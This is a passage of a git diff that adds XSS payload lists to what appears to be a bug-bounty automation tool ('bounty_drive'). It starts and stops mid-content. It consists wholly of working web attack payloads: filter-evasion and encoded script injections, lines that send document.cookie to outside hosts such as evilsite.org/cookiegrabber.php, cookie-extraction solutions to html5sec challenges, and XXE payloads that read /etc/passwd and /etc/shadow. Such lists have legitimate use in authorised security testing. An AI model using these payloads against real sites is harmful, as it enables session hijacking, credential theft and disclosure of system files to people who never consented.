HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; +<;/script>;<;script>;alert(1)<;/script>; +<;/br style=a:expression(alert())>; +<;scrscriptipt>;alert(1)<;/scrscriptipt>; +<;br size=\";&;{alert(&#039;XSS&#039;)}\";>; +perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out +perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +>"><script>alert("XSS")</script>& +"><STYLE>@import"javascript:alert('XSS')";</STYLE> +>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +'';!--"<XSS>=&{()} +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)> +<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +<![CDATA[<script>var n=0;while(true){n++;}</script>]]> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> +<script>alert('XSS')</script> +%3cscript%3ealert('XSS')%3c/script%3e +%22%3e%3cscript%3ealert('XSS')%3c/script%3e +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert('XSS')> +<img src=xss onerror=alert(1)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +<<SCRIPT>alert("XSS");//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +"><s"%2b"cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<marquee onstart='javascript:alert('1');'>=(◕_◕)= \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/target.txt b/bounty_drive/attacks/xss/payloads/target.txt new file mode 100644 index 0000000..24bed2c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/target.txt @@ -0,0 +1,260 @@ + +'';!--"<XSS>=&{()} +'>//\\,<'>">">"*" +'); alert('XSS +<script>alert(1);</script> +<script>alert('XSS');</script> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<script src=" http://www.evilsite.org/ +cookiegrabber.php "></script> +<script>location.href=" http://www.evilsite.org/ +cookiegrabber.php?cookie= "+escape(docume +nt.cookie)</script> +<scr<script>ipt>alert('XSS');</scr</script>ipt> +<script>alert(String.fromCharCode(88,83,83))</ +script> +<img src=foo.png onerror=alert(/xssed/) /> +<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</ +style> +<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ? +> +<marquee><script>alert('XSS')</script></marquee> +<IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> +<IMG SRC=javascript:alert(String.fromCharCode +(88,83,83))> +"><script>alert(0)</script> +<script src= http://yoursite.com/your_files.js ></ +script> +</title><script>alert(/xss/)</script> +</textarea><script>alert(/xss/)</script> +<IMG LOWSRC=\"javascript:alert('XSS')\"> +<IMG DYNSRC=\"javascript:alert('XSS')\"> +<font style='color:expression(alert(document.cookie +))'> +<img src="javascript:alert('XSS')"> +<script language="JavaScript">alert('XSS')</script> +<body onunload="javascript:alert('XSS');"> +<body onLoad="alert('XSS');" +[color=red' onmouseover="alert('xss')"]mouse over +[/color] +"/></a></><img src=1.gif onerror=alert(1)> +window.alert("Bonjour !"); +<div style="x:expression((window.r==1)?'':eval('r=1; +alert(String.fromCharCode(88,83,83));'))"> +<iframe<?php echo chr(11)?> onload=alert('X +SS')></iframe> +"><script alert(String.fromCharCode(88,83,83))</ +script> +'>><marquee><h1>XSS</h1></marquee> +'">><script>alert('XSS')</script> +'">><marquee><h1>XSS</h1></marquee> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url +=javascript:alert('XSS');\"> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; +URL=http://;URL=javascript:alert('XSS');\"> +<script>var var = 1; alert(var)</script> +<STYLE type="text/css">BODY{background:url +("javascript:alert('XSS')")}</STYLE> +<?='<SCRIPT>alert("XSS")</SCRIPT>'?> +<IMG SRC='vbscript:msgbox(\"XSS\")'> +" onfocus=alert(document.domain) "> <" +<FRAMESET><FRAME SRC=\"javascript:alert('XSS'); +\"></FRAMESET> +<STYLE>li {list-style-image: url(\"javascript:alert +('XSS')\");}</STYLE><UL><LI>XSS +perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR +\0IPT>\";' > out +perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\" +)>\";' > out +<br size=\"&{alert('XSS')}\"> +<scrscriptipt>alert(1)</scrscriptipt> +</br style=a:expression(alert())> +</script><script>alert(1)</script> +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert +("XSS")> +[color=red width=expression(alert(123))][color] +<BASE HREF="javascript:alert('XSS');//"> +Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +"></iframe><script>alert(123)</script> +<body onLoad="while(true) alert('XSS');"> +'"></title><script>alert(1111)</script> +</textarea>'"><script>alert(document.cookie)</ +script> +'""><script language="JavaScript"> alert('X \nS +\nS');</script> +</script></script><<<<script><>>>><<<script>alert +(123)</script> +<html><noalert><noscript>(123)</noscript><script> +(123)</script> +<INPUT TYPE="IMAGE" SRC="javascript:alert +('XSS');"> +'></select><script>alert(123)</script> +'>"><script src = ' http://www.site.com/XSS.js '></ +script> +}</style><script>a=eval;b=alert;a(b(/XSS/ +.source));</script> +<SCRIPT>document.write("XSS");</SCRIPT> +a="get";b="URL";c="javascript:";d="alert('xss +');";eval(a+b+c+d); +='><script>alert("xss")</script> +<script+src=">"+src=" http://yoursite.com/xss.js? +69,69 "></script> +<body background=javascript:'"><script>alert +(navigator.userAgent)</script>></body> +">/XaDoS/><script>alert(document.cookie)</ +script><script src=" http://www.site.com/XSS.js "></ +script>">/KinG-InFeT.NeT/><script>alert(d +ocument.cookie)</script> +src=" http://www.site.com/XSS.js "></script> +data:text/html;charset=utf-7;base64,Ij48L +3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTM +zNyk8L3NjcmlwdD4= +!--" /><script>alert('xss');</script> +<script>alert("XSS by \nxss")</script><marquee> +<h1>XSS by xss</h1></marquee> +"><script>alert("XSS by \nxss")</script>><marquee +><h1>XSS by xss</h1></marquee> +'"></title><script>alert("XSS by \nxss")</ +script>><marquee><h1>XSS by xss</h1></ +marquee> +<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +<script>alert(1337)</script><marquee><h1>XSS by +xss</h1></marquee> +"><script>alert(1337)</script>"><script>alert("XSS +by \nxss</h1></marquee> +'"></title><script>alert(1337)</script>><marquee +><h1>XSS by xss</h1></marquee> +<iframe src="javascript:alert('XSS by \nxss');"></ +iframe><marquee><h1>XSS by xss</h1></marquee> +<iframe src= http://othersite/sb.php > + +%22onmouseover%3d%27alert +%28%22immuniweb%22%29%27%20a%3d +%22%3E +<img src="x:gif" onerror="alert(0)"> +<img src="x:alert" onerror="eval(src '(0)')"> +<img src="x:gif" onerror="eval('al' 'lert(0)')"> +<img src="x:gif" onerror="window['alu0065rt'] +(0)"></img> +";document.write('<img src=http://p42.us/x.png?' +document.cookie '>');" +";document.write('<img sr' 'c=http://p42.us/x.png?' +document['cookie'] '>');" +LFI +/foo/../etc/bar/../passwd +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> +<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># +<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object 